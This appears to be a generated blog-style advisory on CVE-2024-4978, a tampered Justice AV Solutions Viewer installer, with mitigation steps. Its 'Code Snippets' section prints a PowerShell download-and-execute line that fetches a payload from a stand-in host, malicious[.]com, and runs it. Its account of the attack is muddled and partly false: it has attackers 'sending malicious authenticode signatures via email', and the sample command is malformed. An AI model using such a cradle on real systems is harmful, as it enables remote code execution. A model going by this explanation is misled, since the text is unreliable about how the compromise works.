Recently, a vulnerability was discovered in Justice AV Solutions Viewer Setup, version 8.3.7.250-1, which may potentially expose your system to security threats. The issue lies in a malicious binary and an unexpected authenticode signature contained in the software installation. In this post, we will discuss the details of this vulnerability, code snippets, relevant patches, and mitigation steps.
Vulnerability Details
CVE-2024-4978 is a vulnerability found in the Justice AV Solutions Viewer Setup software, which is used for managing and accessing Audio/Video content across different devices in the legal industry. The vulnerability exposes the risk of unauthorized Powershell command execution by remote privileged threat actors. This could lead to exploitation of sensitive information and system breaches.
The vulnerability's root cause is a malicious binary that comes into effect upon the execution of the setup file. This binary has been found to contain an unexpected authenticode signature, meaning that it is not the originally intended signature provided by the software’s creators. This indicates that the software has been tampered with and could potentially be exploited for malicious purposes.
Code Snippets
The snippet below demonstrates a sample PowerShell command that a threat actor could execute on the target system:
Invoke-Expression "IEX (New-Object Net.WebClient).DownloadString('http://malicious[.]com/payload';)"
This sample command downloads a malicious payload from a remote server and executes it on the target machine, causing a potential security breach.
Original References
1. The official CVE page: CVE-2024-4978
2. The National Vulnerability Database (NVD) entry: NVD - CVE-2024-4978
Exploitation and Mitigation
Remote privileged threat actors can exploit this vulnerability by sending malicious authenticode signatures via email or other means to trick users into installing the software, which then grants them the ability to run unauthorized PowerShell commands on the system.
To mitigate this vulnerability, individuals and organizations using the Justice AV Solutions Viewer Setup (version 8.3.7.250-1) should adopt the following steps:
Immediately stop using the affected version and uninstall it from your system.
2. Download and install the patched version of the software from the official website.
3. Check with your IT department or security team to ensure that no unauthorized PowerShell commands have been executed on your system.
4. Regularly update your software, as well as your antivirus and antimalware solutions, to protect against any future threats.
Conclusion
In conclusion, individuals and organizations utilizing Justice AV Solutions Viewer Setup version 8.3.7.250-1 should act immediately to mitigate this critical vulnerability (CVE-2024-4978). This involves uninstalling the affected version, installing the patched version, and ensuring cybersecurity measures are up to date. Doing so will help keep your systems safe from unauthorized PowerShell command execution and other potential threats.
Timeline
Published on: 05/23/2024 02:15:09 UTC
Last modified on: 08/01/2024 20:55:10 UTC